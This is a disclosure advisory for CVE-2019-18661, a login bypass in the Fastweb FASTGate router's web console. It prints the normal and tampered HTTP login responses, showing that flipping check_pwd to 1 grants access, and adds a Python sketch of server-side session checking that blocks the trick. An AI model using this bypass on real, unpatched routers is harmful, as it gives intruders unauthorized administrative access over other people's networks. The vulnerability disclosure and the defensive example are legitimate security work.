CVE-2019-18661

Fastweb FASTGate Router

Software version: 1.0.1b

WEB Authentication Bypass:

It is possible to bypass the login and reach the router's web administration console without knowing the user credentials. After a sign-in attempt with random credentials, an error message is normally returned and access to the web console is denied. That logical control can be bypassed by changing the check_pwd value in the server's response from 0 to 1 before it reaches the browser, since the console relies on that client-side check.

Regular Response with random credentials:

HTTP/1.1 200 OK
Server: nginx
Date: Wed, DD MM 2019 22:18:45 GMT
Content-Type: text/plain
Connection: close
X-Frame-Options: SAMEORIGIN
CONTENT-LANGUAGE: en
Content-Security-Policy: default-src 'self';script-src 'self' 'unsafe-eval' 'unsafe-inline';style-src 'self' 'unsafe-inline'
Content-Length: 96

{
  "login_confirm":{
    "login_confirm":"end",
    "check_user":"1",
    "check_pwd":"0"
  }
}

Modified Response after using random credentials:

HTTP/1.1 200 OK
Server: nginx
Date: Wed, DD MM 2019 22:18:45 GMT
Content-Type: text/plain
Connection: close
X-Frame-Options: SAMEORIGIN
CONTENT-LANGUAGE: en
Content-Security-Policy: default-src 'self';script-src 'self' 'unsafe-eval' 'unsafe-inline';style-src 'self' 'unsafe-inline'
Content-Length: 96

{
  "login_confirm":{
    "login_confirm":"end",
    "check_user":"1",
    "check_pwd":"1"
  }
}

There is no configuration disclosure, but the web console is fully navigable, giving an attacker visibility of all pages and features of the administration console. The user appears genuinely authenticated, as shown by the presence of the logout button. An unauthorized user should not be able to access or see the administrative features, and any unauthorized request should be redirected to the default login page.
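As an added defender's illustration (not code from the advisory or from Fastweb), the sketch below shows the control the previous paragraph asks for: the server decides authorization from its own session record on every request, so a client that rewrites check_pwd in the login reply is still redirected to /login. The demo credential, salt, paths and session store are constructed for the example.

```python
import hashlib
import hmac
import secrets
from typing import Dict, Optional, Set, Tuple

# Constructed demo account (not the router's); only a salted hash is stored.
_SALT = b"demo-salt"
_USERS: Dict[str, str] = {"admin": hashlib.sha256(_SALT + b"correct-horse").hexdigest()}
# Server-side record of issued sessions: the only thing authorization trusts.
_SESSIONS: Set[str] = set()


def login(user: str, password: str) -> Tuple[dict, Optional[str]]:
    """Check credentials and return (login_confirm body, session token or None).

    The JSON body mirrors the advisory's format but is informational only:
    nothing on the server side ever reads check_pwd back from the client."""
    digest = hashlib.sha256(_SALT + password.encode()).hexdigest()
    ok = user in _USERS and hmac.compare_digest(digest, _USERS[user])
    # check_user is kept constant so the reply does not reveal which names exist.
    body = {"login_confirm": {"login_confirm": "end",
                              "check_user": "1",
                              "check_pwd": "1" if ok else "0"}}
    if not ok:
        return body, None
    token = secrets.token_hex(32)       # unguessable, issued only on success
    _SESSIONS.add(token)
    return body, token


def handle_request(path: str, session_cookie: Optional[str]) -> Tuple[int, str]:
    """Gate every admin page on a server-issued session; otherwise redirect.

    Returns (status, location_or_body)."""
    if path == "/login":
        return 200, "login page"
    if session_cookie is None or session_cookie not in _SESSIONS:
        return 302, "/login"            # unauthorized requests go to the login page
    return 200, "admin page " + path


def tampered_client_gets_admin_page() -> bool:
    """Replay the advisory's trick against this server: the client flips
    check_pwd to "1" in the login reply, then requests an admin page."""
    body, token = login("admin", "random-guess")
    body["login_confirm"]["check_pwd"] = "1"   # client-side edit, as in the advisory
    status, _ = handle_request("/admin/status", token)  # token is None: nothing to present
    return status == 200
```

The tampered reply changes only what the browser shows; without a token the server never issued, every admin request still ends in a 302 to /login.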

The vulnerability was reported to the Fastweb team, which promptly proceeded to fix it.

Reference

link CVE